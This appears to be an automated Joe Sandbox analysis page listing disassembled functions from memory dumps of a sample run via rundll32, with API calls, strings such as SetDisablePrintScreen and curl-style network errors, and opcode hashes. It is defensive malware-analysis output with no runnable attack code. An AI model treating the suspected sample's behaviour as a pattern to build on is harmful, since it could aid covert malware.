Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd

Similarity

API ID:
String ID: %s%s%s$Couldn't set desired mode$Got a %03d response code instead of the assumed 200$LIST$NLST
API String ID: 0-3982560815
Opcode ID: e69b8f91076b8199cc9f8b0aa0448e675aa82e8b43c1d3fe8dae40eea2d628c7
Instruction ID: 376c17157d0276ea1f76b679e56610e0eac4af298cdc6aae020558afd54fa68d
Opcode Fuzzy Hash: e69b8f91076b8199cc9f8b0aa0448e675aa82e8b43c1d3fe8dae40eea2d628c7
Instruction Fuzzy Hash: 194136B6F062016FF7118A68AC40BBB73E9DBC5265F150439F649CB242E721EC0986A6

Function 6CFF52C9 Relevance: 10.5, APIs: 7, Instructions: 44COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6CFF52D0
std::_Lockit::_Lockit.LIBCPMT ref: 6CFF52DB
std::locale::_Setgloballocale.LIBCPMT ref: 6CFF52F6
_Yarn.LIBCPMT ref: 6CFF530C
?SetDisablePrintScreen@@YAXH@Z.HKEYBOARD(6D070F48,00000000,00000004,6CFF469D,00000001,76230BD0,000000FF,?,6CFF3941,76230BD4,00000002,93BD9D6B,00000000,00000000), ref: 6CFF5318
?SetDisablePrintScreen@@YAXH@Z.HKEYBOARD(00000000,00000004,6CFF469D,00000001,76230BD0,000000FF,?,6CFF3941,76230BD4,00000002,93BD9D6B,00000000), ref: 6CFF533C
std::_Lockit::~_Lockit.LIBCPMT ref: 6CFF5349

Part of subcall function 6CFF542C: std::locale::_Locimp::_Locimp.LIBCPMT ref: 6CFF5444

Memory Dump Source

Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true

Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd

Similarity

API ID: DisableLockitPrintScreen@@std::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
String ID:
API String ID: 4086063808-0
Opcode ID: a6e326fca0a63e80a57da541ef881fe42537718a81f73c5fb547fed343142d13
Instruction ID: 3b55e7b81d616e940d1b8c379093f2a8cfd95688f6f0ce73b9590b43315c1ad4
Opcode Fuzzy Hash: a6e326fca0a63e80a57da541ef881fe42537718a81f73c5fb547fed343142d13
Instruction Fuzzy Hash: 46014279A042249BDB06CF20D890BBC3B71FF86214B24800CE8225BBC0CF746A03CBC6

Function 6D05C75A Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,93BD9D6B,?,?,00000000,6D06F243,000000FF,?,6D05C6F4,6D05C80B,?,6D05C6C8,00000000), ref: 6D05C78F
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6D05C7A1
?SetDisablePrintScreen@@YAXH@Z.HKEYBOARD(6D05C80B,?,?,00000000,6D06F243,000000FF,?,6D05C6F4,6D05C80B,?,6D05C6C8,00000000), ref: 6D05C7B2
FreeLibrary.KERNEL32(00000000,?,?,00000000,6D06F243,000000FF,?,6D05C6F4,6D05C80B,?,6D05C6C8,00000000), ref: 6D05C7C3

Strings

mscoree.dll, xrefs: 6D05C788
CorExitProcess, xrefs: 6D05C799

Memory Dump Source

Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true

Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd

Similarity

API ID: AddressDisableFreeHandleLibraryModulePrintProcScreen@@
String ID: CorExitProcess$mscoree.dll
API String ID: 2679947756-1276376045
Opcode ID: 96e33d62a34c94c4d255624059b3e428c7125f5b2fc7a049ac4bb1966e627db1
Instruction ID: f09e3258f1a795d404af672c36304c3a078f9fced63cc63133ced4f017a665a0
Opcode Fuzzy Hash: 96e33d62a34c94c4d255624059b3e428c7125f5b2fc7a049ac4bb1966e627db1
Instruction Fuzzy Hash: 6701A73290456AABEF019F51CC05FBE7BF8FB45715F000225FC22A26D0D7759900CA94

Function 04EB470B Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,04ECC578,00000008,04EB4813,00000000,00000000,?,04EB750C,00000000,00000001,00000000,?,04EBB043,00000018,04ECC790,0000000C), ref: 04EB471C
__lock.LIBCMT ref: 04EB4750

Part of subcall function 04EBB0B8: __mtinitlocknum.LIBCMT ref: 04EBB0CE
Part of subcall function 04EBB0B8: __amsg_exit.LIBCMT ref: 04EBB0DA
Part of subcall function 04EBB0B8: EnterCriticalSection.KERNEL32(00000000,00000000,?,04EB48E3,0000000D,04ECC5A0,00000008,04EB49DA,00000000,?,04EB3E44,00000000,04ECC518,00000008,04EB3EA9,?), ref: 04EBB0E2

InterlockedIncrement.KERNEL32(?), ref: 04EB475D
__lock.LIBCMT ref: 04EB4771
___addlocaleref.LIBCMT ref: 04EB478F

Strings

KERNEL32.DLL, xrefs: 04EB4717

Memory Dump Source

Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true

Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd

Similarity

API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
String ID: KERNEL32.DLL
API String ID: 637971194-2576044830
Opcode ID: 79cd2d9d4f1f6f5b662483fa205ac2b7d01721fd42f639c5055d2bf93a206cec
Instruction ID: 1c924f3077a5a6be8de69c2f5d72606407d6169564635760d80aec37f0f369fd
Opcode Fuzzy Hash: 79cd2d9d4f1f6f5b662483fa205ac2b7d01721fd42f639c5055d2bf93a206cec
Instruction Fuzzy Hash: 33015E71440B00DFE721EF69D50978ABBE0BF40319F10990DD8D557690CBB4B545CF91

Function 04EC256D Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 23COMMON

Download Yara Rule

APIs

__getptd.LIBCMT ref: 04EC258E

Part of subcall function 04EB4838: __getptd_noexit.LIBCMT ref: 04EB483B
Part of subcall function 04EB4838: __amsg_exit.LIBCMT ref: 04EB4848

__getptd.LIBCMT ref: 04EC259F
__getptd.LIBCMT ref: 04EC25AD

Strings

csm, xrefs: 04EC2587
MOC, xrefs: 04EC2580
RCC, xrefs: 04EC2579

Memory Dump Source

Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true

Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd

Similarity

API ID: __getptd$__amsg_exit__getptd_noexit
String ID: MOC$RCC$csm
API String ID: 803148776-2671469338
Opcode ID: c0ce39c1916d8a9dda21a02b254ebde3567adb5e830cdf3f1d590b44610f3d80
Instruction ID: 3e10055c28c91c9e716f069f94fd740696b5e073c85e794c7fad5dc6d550c6f6
Opcode Fuzzy Hash: c0ce39c1916d8a9dda21a02b254ebde3567adb5e830cdf3f1d590b44610f3d80
Instruction Fuzzy Hash: 3BE012749041448EDB20AB68D2597EE36D4EB8821CF5630E5E58CC7262C775F8918583

Function 04EE1975 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 23COMMON

Download Yara Rule

APIs

__getptd.LIBCMT ref: 04EE1996

Part of subcall function 04ED3A90: __getptd_noexit.LIBCMT ref: 04ED3A93
Part of subcall function 04ED3A90: __amsg_exit.LIBCMT ref: 04ED3AA0

__getptd.LIBCMT ref: 04EE19A7
__getptd.LIBCMT ref: 04EE19B5

Strings

MOC, xrefs: 04EE1988
csm, xrefs: 04EE198F
RCC, xrefs: 04EE1981

Memory Dump Source

Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true

Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd

Similarity

API ID: __getptd$__amsg_exit__getptd_noexit
String ID: MOC$RCC$csm
API String ID: 803148776-2671469338
Opcode ID: 64cb293eba0dea1c5e2c42353cd1dde031a31cd41995d287c30ae4d6b0d1df31
Instruction ID: 6b23cbb0de2251482d2d8ebaa0c5d61e1cb162b82ffaa140f1937f0079758414
Opcode Fuzzy Hash: 64cb293eba0dea1c5e2c42353cd1dde031a31cd41995d287c30ae4d6b0d1df31
Instruction Fuzzy Hash: CAE01A386001048EDB24EB69C049BB873D5BF8825DF5A24E1D94DCB222D73AF5918953

Function 6D05E264 Relevance: 9.3, APIs: 6, Instructions: 292COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true

Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 03981781a3597a0d89d582af0a334b93bbdb1d2b37c9825902e0ca78667bd343
Instruction ID: ad2976187d4380cd3eafc77e0477ee4669ddb6b8a4a4ce72ba490b0bb6707101
Opcode Fuzzy Hash: 03981781a3597a0d89d582af0a334b93bbdb1d2b37c9825902e0ca78667bd343
Instruction Fuzzy Hash: D9B1F574A08249AFFF01CFA9CA40BAEBBF5BF46314F104199ED91DB281D7709961CB61

Function 6CFF4600 Relevance: 9.2, APIs: 6, Instructions: 162COMMON

Download Yara Rule

APIs

Part of subcall function 6CFF1D10: ___std_exception_copy.LIBVCRUNTIME ref: 6CFF1DAF

Part of subcall function 6CFF52C9: __EH_prolog3.LIBCMT ref: 6CFF52D0
Part of subcall function 6CFF52C9: std::_Lockit::_Lockit.LIBCPMT ref: 6CFF52DB
Part of subcall function 6CFF52C9: std::locale::_Setgloballocale.LIBCPMT ref: 6CFF52F6
Part of subcall function 6CFF52C9: _Yarn.LIBCPMT ref: 6CFF530C
Part of subcall function 6CFF52C9: ?SetDisablePrintScreen@@YAXH@Z.HKEYBOARD(6D070F48,00000000,00000004,6CFF469D,00000001,76230BD0,000000FF,?,6CFF3941,76230BD4,00000002,93BD9D6B,00000000,00000000), ref: 6CFF5318
Part of subcall function 6CFF52C9: ?SetDisablePrintScreen@@YAXH@Z.HKEYBOARD(00000000,00000004,6CFF469D,00000001,76230BD0,000000FF,?,6CFF3941,76230BD4,00000002,93BD9D6B,00000000), ref: 6CFF533C
Part of subcall function 6CFF52C9: std::_Lockit::~_Lockit.LIBCPMT ref: 6CFF5349

std::_Lockit::_Lockit.LIBCPMT ref: 6CFF46CF
std::_Lockit::_Lockit.LIBCPMT ref: 6CFF46F3
std::_Lockit::~_Lockit.LIBCPMT ref: 6CFF4714
std::_Facet_Register.LIBCPMT ref: 6CFF4786
std::_Lockit::~_Lockit.LIBCPMT ref: 6CFF47A2
Concurrency::cancel_current_task.LIBCPMT ref: 6CFF4808

Memory Dump Source

Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true

Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$DisablePrintScreen@@$Concurrency::cancel_current_taskFacet_H_prolog3RegisterSetgloballocaleYarn___std_exception_copystd::locale::_
String ID:
API String ID: 510134389-0
Opcode ID: 8ef982e104bff47bd5fd6420283c99fc0813d8a9b2bea637fe9d47f57dd8ae5c
Instruction ID: 243a28b416700a986592b62ceb2ec80e9dd95c538b55743b5187cb1acf762303
Opcode Fuzzy Hash: 8ef982e104bff47bd5fd6420283c99fc0813d8a9b2bea637fe9d47f57dd8ae5c
Instruction Fuzzy Hash: B5616EB1A006099FEB10CFA4C584B9EBBF0FF0A714F244619E425ABB90D775A949CFD1

Function 6D055DB6 Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 370COMMONLIBRARYCODE

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 6D055EA0
__freea.LIBCMT ref: 6D055F30
__freea.LIBCMT ref: 6D055F4C

Strings

a/p, xrefs: 6D056012
am/pm, xrefs: 6D055FAE

Memory Dump Source

Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true

Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd

Similarity

API ID: __freea$__alloca_probe_16
String ID: a/p$am/pm
API String ID: 3509577899-3206640213
Opcode ID: d491f2a09968ffb177d7499350efe21d98a6f5369b3a8a247cfb78c706d35a92
Instruction ID: e452fb751f2815ff489189a3846a3dbd495a84f77e36e82c7aaa27f7d906e749
Opcode Fuzzy Hash: d491f2a09968ffb177d7499350efe21d98a6f5369b3a8a247cfb78c706d35a92
Instruction Fuzzy Hash: 69C1ED38954213DBFB118F68CA98BBE77F0FF06340F848159ED10AB652D3318961CBA9

Function 6CFF4810 Relevance: 9.1, APIs: 6, Instructions: 103COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6CFF4846
std::_Lockit::_Lockit.LIBCPMT ref: 6CFF4869
std::_Lockit::~_Lockit.LIBCPMT ref: 6CFF4889
std::_Facet_Register.LIBCPMT ref: 6CFF48FB
std::_Lockit::~_Lockit.LIBCPMT ref: 6CFF4913
Concurrency::cancel_current_task.LIBCPMT ref: 6CFF4936

Memory Dump Source

Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true

Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 2081738530-0
Opcode ID: c2bf29ca8b4520313cc892b6ccec4563806194f98192f090bb7a7eccdf970a66
Instruction ID: 5ef31fc664f0cc8aa56a061a26ed21cbbde4b33ae1de4c6ed1f3f5d60d61b48a
Opcode Fuzzy Hash: c2bf29ca8b4520313cc892b6ccec4563806194f98192f090bb7a7eccdf970a66
Instruction Fuzzy Hash: 4041CE72D00259CFDF11CF94D540BAEBBB4FB06728F244619D82567BA0EB31AA06CBD1

Function 6D04C983 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(00000001,?,6D04C8A2,6D048E4B,6D048A5F,?,6D048C97,?,00000001,?,?,00000001,?,6D086738,0000000C,6D048D90), ref: 6D04C991
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6D04C99F
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6D04C9B8
SetLastError.KERNEL32(00000000,6D048C97,?,00000001,?,?,00000001,?,6D086738,0000000C,6D048D90,?,00000001,?), ref: 6D04CA0A

Memory Dump Source

Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true

Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 932dab4309c061606c25ed063112f8c5c645b2f71c11c6f297fdbf3f0520a286
Instruction ID: 94ab123a778c397a64638ca4e001125fbd558a0fd0e1d808d30f5b6840746a16
Opcode Fuzzy Hash: 932dab4309c061606c25ed063112f8c5c645b2f71c11c6f297fdbf3f0520a286
Instruction Fuzzy Hash: CA01B53351D312EEFB009A756C98F5E27A4EB437B97218339F610960D0EF514C148198

Function 04EE1C27 Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__CreateFrameInfo.LIBCMT ref: 04EE1C4F

Part of subcall function 04EE17DF: __getptd.LIBCMT ref: 04EE17ED
Part of subcall function 04EE17DF: __getptd.LIBCMT ref: 04EE17FB

__getptd.LIBCMT ref: 04EE1C59

Part of subcall function 04ED3A90: __getptd_noexit.LIBCMT ref: 04ED3A93
Part of subcall function 04ED3A90: __amsg_exit.LIBCMT ref: 04ED3AA0

__getptd.LIBCMT ref: 04EE1C67
__getptd.LIBCMT ref: 04EE1C75
__getptd.LIBCMT ref: 04EE1C80
_CallCatchBlock2.LIBCMT ref: 04EE1CA6

Part of subcall function 04EE1884: __CallSettingFrame@12.LIBCMT ref: 04EE18D0

Part of subcall function 04EE1D4D: __getptd.LIBCMT ref: 04EE1D5C
Part of subcall function 04EE1D4D: __getptd.LIBCMT ref: 04EE1D6A

Memory Dump Source

Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true

Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd

Similarity

API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
String ID:
API String ID: 1602911419-0
Opcode ID: 30984a6dbe13d97b5960a4b950b05162d02aa1851b1736e288da5e5fa3881a39
Instruction ID: b95b08bc50774553df0e95e3a152f3ec9f8644ba5dee18aa70b75a0cfe9d1996
Opcode Fuzzy Hash: 30984a6dbe13d97b5960a4b950b05162d02aa1851b1736e288da5e5fa3881a39
Instruction Fuzzy Hash: 5011DA75D00209DFEB00EFA4C444BEEB7F1FF04318F509469E855AB250DB38A9559F51

Function 04EC281F Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__CreateFrameInfo.LIBCMT ref: 04EC2847

Part of subcall function 04EC23D7: __getptd.LIBCMT ref: 04EC23E5
Part of subcall function 04EC23D7: __getptd.LIBCMT ref: 04EC23F3

__getptd.LIBCMT ref: 04EC2851

Part of subcall function 04EB4838: __getptd_noexit.LIBCMT ref: 04EB483B
Part of subcall function 04EB4838: __amsg_exit.LIBCMT ref: 04EB4848

__getptd.LIBCMT ref: 04EC285F
__getptd.LIBCMT ref: 04EC286D
__getptd.LIBCMT ref: 04EC2878
_CallCatchBlock2.LIBCMT ref: 04EC289E

Part of subcall function 04EC247C: __CallSettingFrame@12.LIBCMT ref: 04EC24C8

Part of subcall function 04EC2945: __getptd.LIBCMT ref: 04EC2954
Part of subcall function 04EC2945: __getptd.LIBCMT ref: 04EC2962

Memory Dump Source

Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true

Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd

Similarity

API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
String ID:
API String ID: 1602911419-0
Opcode ID: eb388a6bf7ffd30d9546cee10c0cefd864d406e6d3b94a6c9bbcab691142f51f
Instruction ID: e3c856d47aefb01e44dfa5fe2bf868f67d68d61b52ee8e2b1a6514ebb3018cdd
Opcode Fuzzy Hash: eb388a6bf7ffd30d9546cee10c0cefd864d406e6d3b94a6c9bbcab691142f51f
Instruction Fuzzy Hash: D611F971D002499FEF00EFA4D544AEE77B0FF08318F5190A9F894A7251DB38AA11DF90

Function 04EB7EEC Relevance: 9.0, APIs: 6, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 04EB7EF8

Part of subcall function 04EB4838: __getptd_noexit.LIBCMT ref: 04EB483B
Part of subcall function 04EB4838: __amsg_exit.LIBCMT ref: 04EB4848

__amsg_exit.LIBCMT ref: 04EB7F18
__lock.LIBCMT ref: 04EB7F28
InterlockedDecrement.KERNEL32(?), ref: 04EB7F45
_free.LIBCMT ref: 04EB7F58
InterlockedIncrement.KERNEL32(051A1680), ref: 04EB7F70

Memory Dump Source

Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true

Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
String ID:
API String ID: 3470314060-0
Opcode ID: 26f422d0de979fe2638f383467e931a3c1eca705c3b4d00eb3ac16a1212f4ed4
Instruction ID: 9434df505bd0d2e61cefc2c6655338521b06924382ae4f66e08404951c63172a
Opcode Fuzzy Hash: 26f422d0de979fe2638f383467e931a3c1eca705c3b4d00eb3ac16a1212f4ed4
Instruction Fuzzy Hash: 9C01C431D00611ABEB21AB69D1097DF7361BB40729F112015E8D4A7A84CB38B842CBD9

Function 6D0432A0 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 237networkCOMMON

Download Yara Rule

APIs

WSAGetLastError.WS2_32 ref: 6D043361

Strings

8, xrefs: 6D043355
response reading failed (errno: %d), xrefs: 6D043368
cached response data too big to handle, xrefs: 6D043508
Excessive server response line length received, %zd bytes. Stripping, xrefs: 6D04344A

Memory Dump Source

Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true

Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd

Similarity

API ID: ErrorLast
String ID: 8$Excessive server response line length received, %zd bytes. Stripping$cached response data too big to handle$response reading failed (errno: %d)
API String ID: 1452528299-4161256678
Opcode ID: c26ff694da01310d2af66d8fd4c41c95c2db1c3759ba701c874baf21ee0f0ea3
Instruction ID: 9bbb86e629e637f7d55cd34ee1812f22e2fbf658b9fb52eaeb90526e24e6febc
Opcode Fuzzy Hash: c26ff694da01310d2af66d8fd4c41c95c2db1c3759ba701c874baf21ee0f0ea3
Instruction Fuzzy Hash: 33818F75648342DFE721CF29D880F6BB7E5AFC9314F50882DF99A87201E735E9098B52

Function 6D018400 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 197COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6D0184E0
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6D0185CD

Strings

%2I64d:%02I64d:%02I64d, xrefs: 6D01852B
%3I64dd %02I64dh, xrefs: 6D0185D9
%7I64dd, xrefs: 6D0185F6

Memory Dump Source

Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true

Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: %2I64d:%02I64d:%02I64d$%3I64dd %02I64dh$%7I64dd
API String ID: 885266447-564197712
Opcode ID: 772373098035c2750342ac1b4f07ba5d8065082ee3588e56394e7481f75c1277
Instruction ID: 52ba6da1e8ad67268486883f17dc1470ac105a351160817e6b770461792ad5fe
Opcode Fuzzy Hash: 772373098035c2750342ac1b4f07ba5d8065082ee3588e56394e7481f75c1277
Instruction Fuzzy Hash: 50514676B083146BE3089E6CDC40B6EB6D6EBC8214F4A463DF958E7391EAB5DD444281

Function 6D032CE0 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 179COMMON

Download Yara Rule

APIs

_strspn.LIBCMT ref: 6D032D39

Strings

/:#?!@{}[]\$'"^`*<>=;,+&(), xrefs: 6D032E9B
%u.%u.%u.%u, xrefs: 6D033022
0123456789abcdefABCDEF:., xrefs: 6D032D33

Memory Dump Source

Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true

Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
